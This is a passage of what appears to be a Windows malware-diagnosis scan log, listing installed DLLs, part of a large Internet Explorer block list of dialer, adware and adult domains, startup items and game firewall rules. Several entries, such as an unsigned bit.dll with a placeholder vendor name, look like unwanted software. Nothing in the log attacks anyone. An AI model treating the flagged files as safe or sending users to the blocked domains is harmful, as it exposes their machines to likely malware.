2012-12-10 14:31 - 2012-12-10 14:31 - 000732160 _____ (Intel(R) Corporation) [File not signed] C:\Program Files\Intel\iCLS Client\HeciServer.exe
2018-03-19 14:18 - 2018-03-19 14:17 - 001548288 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\LIBEAY32.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 000395776 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\ssleay32.dll
2018-03-19 14:18 - 2018-03-19 14:17 - 001611264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 005487104 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Core.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 005841920 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Gui.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 001177600 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Network.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 005089792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 000184832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Xml.dll
2017-05-16 01:07 - 2017-05-17 16:05 - 001811968 _____ (TODO: <ĺ…¬ĺŹ¸ĺŤ>) [File not signed] c:\programdata\bit\bit.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\100sexlinks.com -> 100sexlinks.com

There are 4788 more sites.

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 15:25 - 2019-07-24 12:56 - 000000826 _____ C:\WINDOWS\system32\drivers\etc\hosts

2019-07-30 00:43 - 2019-07-30 00:43 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files (x86)\AMD\ATI.ACE\Core-Static;C:\Program Files (x86)\Skype\Phone\
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\Control Panel\Desktop\\Wallpaper -> C:\Users\Radim\Pictures\Tropico 4\1749340.jpg
DNS Servers: 10.255.255.10 - 10.255.255.20
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName2 -> ndptsp.tsp (No File)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

HKLM\...\StartupApproved\Run32: => "BtTray"
HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui"
HKLM\...\StartupApproved\Run32: => "seznam-listicka-distribuce"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\StartupFolder: => "Facebook Gameroom.lnk"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "Windows"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "RGSC"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "se"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "Flvto YouTube Downloader"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "cz.seznam.software.autoupdate"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "cz.seznam.software.szndesktop"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "YeaDesktop"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "Discord"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{506D5F42-5777-4088-92CA-B408847957D4}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE (CyberLink -> CyberLink Corp.)
FirewallRules: [{17C9FA09-0EED-4FE9-8E0F-C961DAE3217C}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE (CyberLink -> CyberLink Corp.)
FirewallRules: [{2C14EE3F-5540-4699-97E1-960C063A3055}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{EB32B93E-A7A4-4924-B3DF-B03FCE7498F1}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{DAAB13BD-B614-4EF0-9BC9-ABFC7445A721}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5mp.exe (Activision Publishing -> )
FirewallRules: [{3E0C05B4-99E1-4923-BCF4-9679AE4DD4E5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5mp.exe (Activision Publishing -> )
FirewallRules: [{CDDD8BAD-C350-404E-8ECD-C5FAE94CC644}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5sp.exe (Valve Corp. -> ) [File not signed]
FirewallRules: [{AC397966-41E4-400F-AF53-5EDEB5C3E3E3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5sp.exe (Valve Corp. -> ) [File not signed]
FirewallRules: [{5D2118AE-E221-4541-8232-0E107FF9D08D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5mp_server.exe (Activision Publishing -> )
FirewallRules: [{53E4D907-00CC-4013-8C15-D42A82E92AFC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5mp_server.exe (Activision Publishing -> )
FirewallRules: [TCP Query User{B7CA29F3-7D70-4D00-A1D4-EE581A2C360F}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{ECB2A13D-8978-4628-A6AE-8584E5759460}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{837F5D77-3A24-490F-9848-315A163977D9}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe (Take-Two Interactive Software, Inc. -> Take-Two Interactive Software, Inc.)
FirewallRules: [{53EDEEC5-42A0-45DB-A9D9-D4018196FC6C}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe (Take-Two Interactive Software, Inc. -> Take-Two Interactive Software, Inc.)
FirewallRules: [TCP Query User{1127BB99-E6C4-4B20-B9D6-1BAE38A00AAF}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Block) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe (THQ Inc.) [File not signed]
FirewallRules: [UDP Query User{5BF00EA2-8DA9-4D69-ACBB-9B45F9D2173E}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Block) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe (THQ Inc.) [File not signed]
FirewallRules: [{8D8281C9-EAB9-476F-8623-42C8B7E045C2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Napoleon Total War\Napoleon.exe (Sega Europe Limited -> The Creative Assembly Ltd)
FirewallRules: [{6CE6FD90-8D01-4738-960B-D972A5337C92}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Napoleon Total War\Napoleon.exe (Sega Europe Limited -> The Creative Assembly Ltd)
FirewallRules: [{540E9876-7DCC-4EBD-B228-69E9922A7DAC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{1FC70DBA-C417-43D2-9D60-AB89B1EE139C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{31772069-9A7A-4AEC-864A-4DAF7DA825E4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{25301E73-F700-4C40-BF17-8AD70935F1DD}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{D8EA10CC-375B-4E7C-AC18-ACD005ABDA26}] => (Allow) C:\Users\Radim\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) [File not signed]
FirewallRules: [{FD791AB8-8F76-4A38-80A1-9A645790F9DF}] => (Allow) C:\Users\Radim\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) [File not signed]
FirewallRules: [TCP Query User{F52CC98F-AB27-4509-98A4-BF897C21DA32}C:\program files (x86)\css\counter-strike source\hl2.exe] => (Allow) C:\program files (x86)\css\counter-strike source\hl2.exe () [File not signed]
FirewallRules: [UDP Query User{EB566BCF-694E-482C-92CC-3EC25705E3B9}C:\program files (x86)\css\counter-strike source\hl2.exe] => (Allow) C:\program files (x86)\css\counter-strike source\hl2.exe () [File not signed]
FirewallRules: [{544617DD-4CDC-4476-88ED-CD6751D3C02E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Empire Total War\Empire.exe (Sega Europe Limited -> The Creative Assembly Ltd)
FirewallRules: [{52E635C6-E427-452A-B874-820DFDF74CE6}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Empire Total War\Empire.exe (Sega Europe Limited -> The Creative Assembly Ltd)
FirewallRules: [TCP Query User{52B783BA-69B5-4064-823F-D844A6509FA3}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [UDP Query User{D4B81CC3-96CF-4E4F-9080-103B27332AEB}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{6B93792A-F3D1-4C0E-98CF-8E60A010DD1A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Rome Total War Gold\RomeTW.exe (The Creative Assembly Ltd) [File not signed]
FirewallRules: [{AFE4B1B0-7E13-4095-ACEF-60C7ED2DA7DB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Rome Total War Gold\RomeTW.exe (The Creative Assembly Ltd) [File not signed]
FirewallRules: [{4190D995-33D5-4475-82D9-F4DACB54F2E6}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Rome Total War Gold\RomeTW-BI.exe (The Creative Assembly Ltd) [File not signed]
FirewallRules: [{DB685A4E-594F-4E72-8185-DE4109839429}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Rome Total War Gold\RomeTW-BI.exe (The Creative Assembly Ltd) [File not signed]
FirewallRules: [{B35168EA-557D-4C12-9C65-F6F7F7162A03}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 2\iw4sp.exe (Valve Corp. -> ) [File not signed]
FirewallRules: [{DA4CFA85-C471-4C99-84F2-FB4941439ED2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 2\iw4sp.exe (Valve Corp. -> ) [File not signed]
FirewallRules: [TCP Query User{34E6E18C-B592-447C-A605-FD632CE6E759}C:\program files (x86)\warcraft iii\war3.exe] => (Block) C:\program files (x86)\warcraft iii\war3.exe (Blizzard Entertainment) [File not signed]
FirewallRules: [UDP Query User{ECED3CF5-4837-420C-8209-1FB882FFA3A7}C:\program files (x86)\warcraft iii\war3.exe] => (Block) C:\program files (x86)\warcraft iii\war3.exe (Blizzard Entertainment) [File not signed]
FirewallRules: [TCP Query User{F4382A3C-3DC2-4EBB-8B48-F40D2B096922}C:\program files (x86)\ubisoft\blue byte\the settlers - dÄ›dictvĂ krĂˇlĹŻ\bin\settlershok.exe] => (Block) C:\program files (x86)\ubisoft\blue byte\the settlers - dÄ›dictvĂ krĂˇlĹŻ\bin\settlershok.exe (Blue Byte Software) [File not signed]
FirewallRules: [UDP Query User{5CEA6FBF-A395-408B-9EAC-1ACB5DAEC859}C:\program files (x86)\ubisoft\blue byte\the settlers - dÄ›dictvĂ krĂˇlĹŻ\bin\settlershok.exe] => (Block) C:\program files (x86)\ubisoft\blue byte\the settlers - dÄ›dictvĂ krĂˇlĹŻ\bin\settlershok.exe (Blue Byte Software) [File not signed]
FirewallRules: [{5AED197E-696C-4C4A-8364-F39B91A7DAFE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Amnesia The Dark Descent\Amnesia.exe () [File not signed]
FirewallRules: [{00C6B48D-926F-48B7-A102-0A1A7880012D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Amnesia The Dark Descent\Amnesia.exe () [File not signed]
FirewallRules: [{2C5A5DF9-1EEC-4179-824B-E53F2E62B647}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Amnesia The Dark Descent\Launcher.exe () [File not signed]
FirewallRules: [{67BE3012-560A-4A92-B77F-F82F7760279D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Amnesia The Dark Descent\Launcher.exe () [File not signed]
FirewallRules: [{5DB23253-BB62-4349-AD6D-65F9B043EC79}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War 2\DOW2.exe (Sega Corporation) [File not signed]
FirewallRules: [{BD5CE768-4E2D-4826-9257-4707F9F6916B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War 2\DOW2.exe (Sega Corporation) [File not signed]
FirewallRules: [{25A09C6F-DA1E-4C00-92B3-E03325B925D2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe (Sega Corporation) [File not signed]
FirewallRules: [{84FD460A-FE88-494A-A65E-6960A393A2BC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe (Sega Corporation) [File not signed]
FirewallRules: [{6C582A34-637A-4814-B48B-AA4982AF87D0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War Gold\W40k.exe (Sega Corporation) [File not signed]
FirewallRules: [{110FCA80-14F9-4DEB-8C45-D5029D217267}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War Gold\W40k.exe (Sega Corporation) [File not signed]
FirewallRules: [{F54D83FE-23B2-47C1-9A6D-C1E98842A4EF}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Tom Clancy's Ghost Recon Phantoms - EU\Launcher.exe (Ubisoft Divertissement Inc -> Ubisoft)
FirewallRules: [{EBC8A5DD-97D3-40A9-9374-8F0F35242182}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Tom Clancy's Ghost Recon Phantoms - EU\Launcher.exe (Ubisoft Divertissement Inc -> Ubisoft)
FirewallRules: [{8B1DE82F-F2DE-4719-8FD5-DE910C16F324}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Men of War - Demo\mow_demo.exe (1C Company -> "Best Way" Corp)
FirewallRules: [{6C47A8D4-6B72-4C5F-A3B3-43FB218B6166}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Men of War - Demo\mow_demo.exe (1C Company -> "Best Way" Corp)
FirewallRules: [{0EBD257C-5CCC-42BF-BC10-4EC2B1633B66}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Juarez - Bound in Blood SP Demo\CoJBiBDemo_x86.exe (Techland -> Techland)
FirewallRules: [{3CAB76EA-4128-491D-894E-462005161B86}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Juarez - Bound in Blood SP Demo\CoJBiBDemo_x86.exe (Techland -> Techland)
FirewallRules: [{8D52A4C8-C785-4504-A0CC-0D2DC3B9CB71}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Tropico 4 - Demo\Tropico4-demo.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [{F19061D1-F833-4BDD-932C-36EBE559458E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Tropico 4 - Demo\Tropico4-demo.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [{3F7F8A03-313A-457F-8DC1-FEFFB1B79F79}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\CoJ Gunslinger\CoJGunslinger_demo.exe (TECHLAND SP Z O O -> Techland)
FirewallRules: [{87A057D8-194D-4723-881A-B5587BD1CAD2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\CoJ Gunslinger\CoJGunslinger_demo.exe (TECHLAND SP Z O O -> Techland)
FirewallRules: [{169CBFF4-8A47-4421-AA28-E2F6AC71DD6F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PAYDAY 2 Demo\payday2_win32_release.exe () [File not signed]
FirewallRules: [{D00718CB-70B1-472C-AA8B-F16C974EB7F3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PAYDAY 2 Demo\payday2_win32_release.exe () [File not signed]
FirewallRules: [{E6100418-94C6-41F0-9AE5-3999D27DA3A5}] => (Allow) C:\Program Files (x86)\GSC World Publishing\S.T.A.L.K.E.R. - Call of Pripyat\bin\xrEngine.exe () [File not signed]
FirewallRules: [{F58A3E8A-A3B4-4C85-84F0-FE9348A6BD40}] => (Allow) C:\Program Files (x86)\GSC World Publishing\S.T.A.L.K.E.R. - Call of Pripyat\bin\xrEngine.exe () [File not signed]
FirewallRules: [{56DF3D33-CD58-4F28-B6D7-C3D51ED8956A}] => (Allow) C:\Program Files (x86)\GSC World Publishing\S.T.A.L.K.E.R. - Call of Pripyat\bin\dedicated\xrEngine.exe (GSC Game World -> )
FirewallRules: [{10375979-C1C0-4110-9492-F1A612B45D37}] => (Allow) C:\Program Files (x86)\GSC World Publishing\S.T.A.L.K.E.R. - Call of Pripyat\bin\dedicated\xrEngine.exe (GSC Game World -> )
FirewallRules: [{4166C9F4-F6D2-4B50-9BEC-E7C08FBC581E}] => (Allow) C:\Program Files (x86)\Deep Silver\S.T.A.L.K.E.R. - Clear Sky\bin\xrEngine.exe (GSC Game World -> )
FirewallRules: [{A945C06C-3BE7-4B67-B296-9E73F715B998}] => (Allow) C:\Program Files (x86)\Deep Silver\S.T.A.L.K.E.R. - Clear Sky\bin\xrEngine.exe (GSC Game World -> )
FirewallRules: [{02DAC774-6725-4A59-932D-F685E6B14CCE}] => (Allow) C:\Program Files (x86)\Deep Silver\S.T.A.L.K.E.R. - Clear Sky\bin\dedicated\xrEngine.exe (GSC Game World -> )
FirewallRules: [{A17EA508-1BEA-40A6-B486-EE191C94E90E}] => (Allow) C:\Program Files (x86)\Deep Silver\S.T.A.L.K.E.R. - Clear Sky\bin\dedicated\xrEngine.exe (GSC Game World -> )
FirewallRules: [TCP Query User{79A59D3C-0DC2-4771-B2B6-0A5CB113EA01}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Block) C:\program files (x86)\libreoffice 4\program\soffice.bin (The Document Foundation) [File not signed]
FirewallRules: [UDP Query User{AFEB7F2E-2BB5-443C-BDAB-999EA4C1A183}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Block) C:\program files (x86)\libreoffice 4\program\soffice.bin (The Document Foundation) [File not signed]
FirewallRules: [TCP Query User{0056BA3C-C876-4AB1-B35C-9C770AFA7D0C}C:\program files\vietcong+no.cd.crack\vietcong.exe] => (Block) C:\program files\vietcong+no.cd.crack\vietcong.exe () [File not signed]
FirewallRules: [UDP Query User{CDC3411D-283E-45F1-997C-6F18660535AD}C:\program files\vietcong+no.cd.crack\vietcong.exe] => (Block) C:\program files\vietcong+no.cd.crack\vietcong.exe () [File not signed]
FirewallRules: [TCP Query User{538CBB5A-A209-4BE2-91E6-E578229223B4}C:\windows\syswow64\dpnsvr.exe] => (Block) C:\windows\syswow64\dpnsvr.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{8F46C7EC-5ECB-4FE8-BEE8-7F2407A5CE00}C:\windows\syswow64\dpnsvr.exe] => (Block) C:\windows\syswow64\dpnsvr.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{7F69616F-63B6-4CF7-AB09-D82813450F85}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Darkest of Days Demo\darkestofdays.exe () [File not signed]
FirewallRules: [{B1569663-2EED-4D76-AB87-956CE9A61B21}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Darkest of Days Demo\darkestofdays.exe () [File not signed]
FirewallRules: [TCP Query User{8EAF7FF1-16AE-477E-AEE5-243DE1BE9A0F}C:\games\world_of_tanks\wotlauncher.exe] => (Allow) C:\games\world_of_tanks\wotlauncher.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [UDP Query User{6F8CD927-5203-40F3-B21E-7DA516FBD1EB}C:\games\world_of_tanks\wotlauncher.exe] => (Allow) C:\games\world_of_tanks\wotlauncher.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [TCP Query User{D4187831-EADE-401B-804C-B4985E9EA7B5}C:\games\world_of_tanks\worldoftanks.exe] => (Allow) C:\games\world_of_tanks\worldoftanks.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [UDP Query User{745B8187-AEE5-4372-89AE-38C91DC29D63}C:\games\world_of_tanks\worldoftanks.exe] => (Allow) C:\games\world_of_tanks\worldoftanks.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [{65317BE0-B084-4E18-98CC-582E305E9A39}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{62FBABC5-024D-4301-AB9C-9452A271007A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{9BB2664B-9CD4-4E7C-B6DF-31E032C27114}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{38E030A9-3965-4C19-B85A-96A956A17D2F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{2B0152AF-43F3-430D-9E75-07877060FA3C}] => (Allow) C:\Program Files (x86)\Ubisoft\Techland\Call of Juarez - Bound in Blood\CoJBiBGame_x86.exe (Techland -> Techland)
FirewallRules: [{000840A5-E9E5-4070-AD70-BD08835702CA}] => (Allow) C:\Program Files (x86)\Ubisoft\Techland\Call of Juarez - Bound in Blood\CoJBiBGame_x86.exe (Techland -> Techland)
FirewallRules: [TCP Query User{37FFBF2D-0C6B-410A-89FD-5DFBB82276E2}C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe] => (Allow) C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe () [File not signed]
FirewallRules: [UDP Query User{4DBAA735-F0B8-4A52-B126-7181B0BE845C}C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe] => (Allow) C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe () [File not signed]
FirewallRules: [TCP Query User{7AE3E3A1-B436-413A-AEDA-C8AFAA5D2BCD}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Allow) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe (THQ Inc.) [File not signed]
FirewallRules: [UDP Query User{91EAA177-35A3-4AF4-805A-581AFA3F51E9}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Allow) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe (THQ Inc.) [File not signed]
FirewallRules: [TCP Query User{ED1F638F-E451-429B-98D6-67D5B3A4BF51}C:\games\world_of_tanks\wotlauncher.exe] => (Allow) C:\games\world_of_tanks\wotlauncher.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [UDP Query User{18467258-E4A2-4842-B2FA-D9CD1782F7A0}C:\games\world_of_tanks\wotlauncher.exe] => (Allow) C:\games\world_of_tanks\wotlauncher.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [TCP Query User{8E84A668-1AA4-4A6D-9DF1-7A89F6D55EA3}C:\games\world_of_tanks\worldoftanks.exe] => (Allow) C:\games\world_of_tanks\worldoftanks.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [UDP Query User{A4E9AFFB-12DC-4667-84B7-AA5A8FB03F1E}C:\games\world_of_tanks\worldoftanks.exe] => (Allow) C:\games\world_of_tanks\worldoftanks.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [{4E8C9063-5FE4-4595-AE51-C66685664272}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlestations Pacific - Demo\bspdemo.exe (Eidos Plc -> EIDOS)
FirewallRules: [{CC633B2E-8A5B-4486-9890-D4D29B975141}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlestations Pacific - Demo\bspdemo.exe (Eidos Plc -> EIDOS)
FirewallRules: [{0B089733-25AE-4971-8969-4C8770AD8928}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Wings of Prey Demo\launcher.exe (Gaijin Entertainment) [File not signed]
FirewallRules: [{61E94234-28B8-4105-8712-99D2AD892478}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Wings of Prey Demo\launcher.exe (Gaijin Entertainment) [File not signed]
FirewallRules: [TCP Query User{F28137E5-3694-4C89-830A-095B4E7C36BA}C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe] => (Allow) C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe () [File not signed]
